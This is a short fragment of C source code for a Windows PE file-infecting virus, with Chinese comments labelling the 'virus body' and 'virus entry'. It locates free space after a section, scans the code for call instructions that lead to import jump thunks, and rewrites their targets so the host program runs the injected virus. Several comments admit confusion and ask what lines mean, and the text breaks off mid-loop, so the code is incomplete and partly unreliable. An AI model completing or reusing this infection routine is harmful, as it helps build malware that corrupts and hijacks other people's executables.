//病毒体
thunkcode
//病毒入口
pGapEntry = (unsigned char *)(pImageSectionHeader->PointerToRawData+
(DWORD)pMapping+
pImageSectionHeader->Misc.VirtualSize) ;
vir_len = (int)pImageSectionHeader->Misc.VirtualSize ;
pSearch = (unsigned char *)(pImageSectionHeader->PointerToRawData+
(DWORD)pMapping) ;
//:::搜索call指令(0xe8)
for (i=0;i<vir_len;i++)
{
if (pSearch[i]==0xe8)
{
dwCallDataAddr = (DWORD *)(&pSearch[i]+1) ;
dwCallNextAddr=(DWORD *)(&pSearch[i]+5) ;
dwJmpAddr = (DWORD *)(*dwCallDataAddr+ (DWORD)dwCallNextAddr) ;
dwJmpVA = (DWORD)dwJmpAddr-
((DWORD)pMapping+pImageSectionHeader->PointerToRawData)+
pImageNtHeaders->OptionalHeader.ImageBase+
pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;
dwJmpData = *((DWORD *)((unsigned char *)dwJmpAddr+2)) ;//这句似乎有错误,这句看不懂
//dwJmpData存放的为原来的地址,也就是病毒体运行后要jmp的地址
//dwJmpData这个值应该怎么求?
if ((*dwJmpAddr&0xffff)==0x25ff)//这句是什么意思
{
dwCodeDistance = (DWORD)pGapEntry - (DWORD)dwCallNextAddr ;
*dwCallDataAddr = dwCodeDistance ;